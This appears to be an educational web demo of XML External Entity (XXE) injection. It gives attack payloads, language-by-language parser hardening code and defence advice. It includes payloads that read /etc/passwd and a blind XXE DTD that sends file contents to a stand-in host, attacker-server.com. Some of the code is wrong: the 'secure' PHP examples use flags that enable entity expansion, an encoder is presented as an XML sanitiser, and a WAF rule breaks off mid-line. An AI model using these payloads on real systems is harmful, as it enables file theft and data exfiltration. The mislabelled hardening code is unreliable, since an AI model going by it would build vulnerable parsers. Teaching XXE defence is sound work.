XML External Entity (XXE) Injection Demo

Understanding XXE Vulnerabilities

1. What is XML External Entity Injection?

XXE vulnerabilities occur when XML parsers process external entity references within XML documents. XML external entities allow XML documents to include content from external sources. If an application parses XML input from untrusted sources without disabling external entities, attackers can exploit this to:

Read sensitive files on the application server
Perform server-side request forgery (SSRF)
Scan internal networks
Execute denial of service attacks
In some rare cases, achieve remote code execution

2. How XXE Attacks Work

Attacker crafts
malicious XML

→

Application parses
XML with vulnerable parser

→

Parser processes
external entities

→

Sensitive data
exposure

3. Common XXE Attack Vectors

Attack Type	Description	Impact
Classic File Disclosure	Using external entities to read local files	Disclosure of sensitive files like /etc/passwd, configuration files, etc.
Blind XXE	XXE vulnerability where responses don't reflect the result	Data exfiltration through out-of-band channels
SSRF via XXE	Using XXE to make requests to internal services	Access to internal systems, service enumeration
Denial of Service	Using recursive entities or large file inclusion	Server resource exhaustion, application outage

4. XML External Entities Explained

XML documents can define entities using the Document Type Definition (DTD):

<!DOCTYPE example [
    <!ENTITY myEntity "some value">
]>
<example>&myEntity;</example>

External entities reference content from outside the document:

<!DOCTYPE example [
    <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<example>&xxe;</example>

XXE Injection Demonstrations

File Read XXE Attack

This demonstration shows how an attacker can read local files on the server using XXE injection.

XML Input (Book Library Import):

Target File Path:

Server Response:

The processed XML result will appear here.

How File Read XXE Works:

This attack exploits XML parsers that process external entity references to read files from the server's filesystem.

The attack works by injecting a DOCTYPE declaration containing an external entity that references a file, then using that entity in the XML document.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE library [
    <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<library>
    <book>
        <title>&xxe;</title>
        <author>Malicious User</author>
        <year>2023</year>
        <category>Hacking</category>
    </book>
</library>

When the XML parser processes this document, it will:

Parse the DOCTYPE declaration
Process the external entity definition
Read the contents of the specified file (/etc/passwd)
Replace the &xxe; reference with the file contents

Blind XXE Attack

This demonstrates blind XXE, where the response doesn't directly include the file contents but the attacker can still exfiltrate data.

XML Input (User Profile Update):

Attacker's Server URL:

Server Response:

The server response will appear here.

Attacker's Server Logs:

No data received yet.

How Blind XXE Works:

In blind XXE attacks, the application doesn't return the content of the external entity in its response. Attackers must use out-of-band techniques to exfiltrate data:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE user [
    <!ENTITY % file SYSTEM "file:///etc/passwd">
    <!ENTITY % dtd SYSTEM "http://attacker-server.com/evil.dtd">
    %dtd;
]>
<user>
    <name>John Doe</name>
    <email>john.doe@example.com</email>
    <role>&send;</role>
    <bio>Software developer with 5 years experience.</bio>
</user>

The evil.dtd hosted on the attacker's server contains:

<!ENTITY % all "
    <!ENTITY send SYSTEM 'http://attacker-server.com/collect?data=%file;'>
">
%all;

This attack works by:

Loading the sensitive file into the %file parameter
Loading a malicious DTD from the attacker's server
The malicious DTD defines an entity that causes the parser to make an HTTP request to the attacker's server
The request includes the content of the sensitive file in a query parameter

XXE Prevention Techniques

This section demonstrates how to properly configure XML parsers to prevent XXE vulnerabilities.

// Vulnerable Java XML parsing
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
DocumentBuilder db = dbf.newDocumentBuilder();
Document doc = db.parse(new InputSource(new StringReader(xmlInput)));

// Secure Java XML parsing
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
// Disable DTDs completely
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
// Or, if DTDs are needed:
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
dbf.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
dbf.setXIncludeAware(false);
dbf.setExpandEntityReferences(false);
DocumentBuilder db = dbf.newDocumentBuilder();
Document doc = db.parse(new InputSource(new StringReader(xmlInput)));

// Vulnerable PHP XML parsing
$dom = new DOMDocument();
$dom->loadXML($xmlInput);

// Secure PHP XML parsing
// Method 1: Using libxml_disable_entity_loader (deprecated in PHP 8.0)
libxml_disable_entity_loader(true);
$dom = new DOMDocument();
$dom->loadXML($xmlInput);

// Method 2: Using parameter options in PHP 8.0+
$dom = new DOMDocument();
$dom->loadXML($xmlInput, LIBXML_NOENT | LIBXML_DTDLOAD);

// Method 3: Using XMLReader
$reader = new XMLReader();
$reader->xml($xmlInput, NULL, LIBXML_NOENT | LIBXML_DTDLOAD);
while ($reader->read()) {
    // Process XML safely
}

// Vulnerable C# XML parsing
XmlDocument doc = new XmlDocument();
doc.LoadXml(xmlInput);

// Secure C# XML parsing
XmlDocument doc = new XmlDocument();
doc.XmlResolver = null; // Prevents XXE
doc.LoadXml(xmlInput);

// Or using XmlReader
XmlReaderSettings settings = new XmlReaderSettings();
settings.DtdProcessing = DtdProcessing.Prohibit;
settings.XmlResolver = null;
XmlReader reader = XmlReader.Create(new StringReader(xmlInput), settings);

# Vulnerable Python XML parsing
from xml.dom.minidom import parseString
doc = parseString(xml_input)

# Secure Python XML parsing
from defusedxml.minidom import parseString
doc = parseString(xml_input)

# Or with lxml
from lxml import etree
parser = etree.XMLParser(resolve_entities=False)
doc = etree.parse(StringIO(xml_input), parser)

// Vulnerable Node.js XML parsing
const xml2js = require('xml2js');
const parser = new xml2js.Parser();
parser.parseString(xmlInput, function(err, result) {
    // Process result
});

// Secure Node.js XML parsing
const xml2js = require('xml2js');
const parser = new xml2js.Parser({
    explicitEntities: false,
    resolveEntities: false
});
parser.parseString(xmlInput, function(err, result) {
    // Process result safely
});

// Or using libxmljs
const libxmljs = require('libxmljs');
const xmlDoc = libxmljs.parseXml(xmlInput, {
    noent: false,
    dtdload: false,
    dtdvalid: false
});

Test XML Input:

Security Validation Result:

Test a defense configuration to see the result.

Best Practices for XXE Prevention:

Disable External Entities - Configure XML parsers to disable DTD processing and external entity resolution
Use Safe Libraries - Use security-focused libraries like defusedxml for Python
Validate and Sanitize - Implement proper input validation on all XML data
Use Alternatives - Consider using JSON instead of XML where possible
Apply Least Privilege - Run your application with minimal file system permissions
Implement WAF Rules - Use web application firewalls to detect and block XXE attack patterns

Real-world XXE Scenarios

This section demonstrates how XXE vulnerabilities appear in common application features.

Select Scenario:

Document Upload/Import Scenario

Many applications allow users to upload or import documents in XML format, such as:

Office documents (DOCX, XLSX, etc. which are ZIP files containing XML)
Data migration files
Configuration files
Content management systems

If the application processes these XML files without proper security controls, XXE vulnerabilities can be exploited.

XML Input:

Exploit Payload:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE document [
    <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<document>
    <title>Malicious Document</title>
    <author>Attacker</author>
    <department>Hacking</department>
    <content>&xxe;</content>
</document>

Application Response:

The simulation result will appear here.

Exploitation Details - Document Upload:

In a document upload scenario, attackers can exploit XXE vulnerabilities by:

Creating a malicious XML document with external entity references
Uploading the document through the application's import feature
When the server processes the XML, it accesses sensitive files or performs SSRF attacks

This is particularly dangerous in business applications that process various document formats based on XML, such as DOCX, XLSX, etc.

Comprehensive XXE Prevention Strategy

1. Defense-in-Depth Approach

Implement multiple layers of protection to ensure that if one defense fails, others will still protect your application:

Parser-level Protections - Disable external entities in XML parsers
Input Validation - Validate and sanitize all XML input
Access Controls - Run applications with minimal privileges
Network Controls - Use firewalls to restrict outbound connections
Monitoring - Implement logging and alerting for suspicious XML processing

2. XML Parser Configuration by Language

// Java - JAXP DocumentBuilderFactory
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true); // Completely disable DTDs
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
dbf.setXIncludeAware(false);
dbf.setExpandEntityReferences(false);

// PHP
libxml_disable_entity_loader(true); // For PHP < 8.0
// In PHP 8.0+, you must use LIBXML_NONET flag instead

// .NET
XmlReaderSettings settings = new XmlReaderSettings();
settings.DtdProcessing = DtdProcessing.Prohibit;
settings.XmlResolver = null;

// Python - Use defusedxml library
from defusedxml import ElementTree
tree = ElementTree.parse(xml_file)

// Node.js - xml2js
const parser = new xml2js.Parser({
    explicitEntities: false,
    resolveEntities: false
});

3. Alternative Data Formats

When possible, avoid XML processing entirely by using alternative data formats:

JSON - Doesn't support external entity references
YAML - But be careful with YAML deserialization vulnerabilities
Protocol Buffers - Google's language-neutral, platform-neutral data format
MessagePack - Fast, small binary format

// Instead of XML, use JSON:
{
  "user": {
    "name": "John Doe",
    "email": "john.doe@example.com",
    "role": "user"
  }
}

4. Use XML Sanitization and Validation Libraries

Employ specialized security libraries to process XML safely:

OWASP XML Security Project
Python's defusedxml
Java's ESAPI XML Validator

// OWASP Enterprise Security API (ESAPI) example
import org.owasp.esapi.ESAPI;
import org.owasp.esapi.codecs.XMLEntityCodec;

String cleanXML = ESAPI.encoder().encodeForXML(untrustedXML);
// Process the cleaned XML

5. Security Testing

Regularly test your application for XXE vulnerabilities:

Include XXE tests in your security testing processes
Use automated scanning tools like OWASP ZAP, Burp Suite, or specialized XXE scanners
Conduct manual penetration testing focusing on XML processing
Review code that handles XML processing as part of security code reviews

6. Implement WAF Rules

Configure Web Application Firewall (WAF) rules to detect and block common XXE attack patterns:

Block requests containing DOCTYPE declarations when not needed
Block external entity references in incoming XML
Monitor for suspicious outbound connections that could indicate successful XXE

// Example ModSecurity WAF rule to block DOCTYPE declarations
SecRule REQUEST_BODY "


        
        7. Keep Software Updated
        Ensure you're using the latest versions of XML parsers and libraries:
        
            Older versions of XML parsers often have insecure defaults
            Security patches for XML libraries should be applied promptly
            Use dependency scanning tools to identify vulnerable XML processing libraries
        
        
        8. Data Flow Monitoring
        Monitor XML data flows within your application:
        
            Track where XML enters your application and how it's processed
            Implement anomaly detection for unusual XML documents or processing patterns
            Set up alerts for unexpected server-side requests that might indicate XXE exploitation
        
        
        9. Documentation and Training
        Educate developers about XXE vulnerabilities:
        
            Document secure XML processing practices within your organization
            Provide training on XXE vulnerabilities and prevention techniques
            Include XML security in developer onboarding and security awareness programs
            Create code review checklists that specifically address XML processing security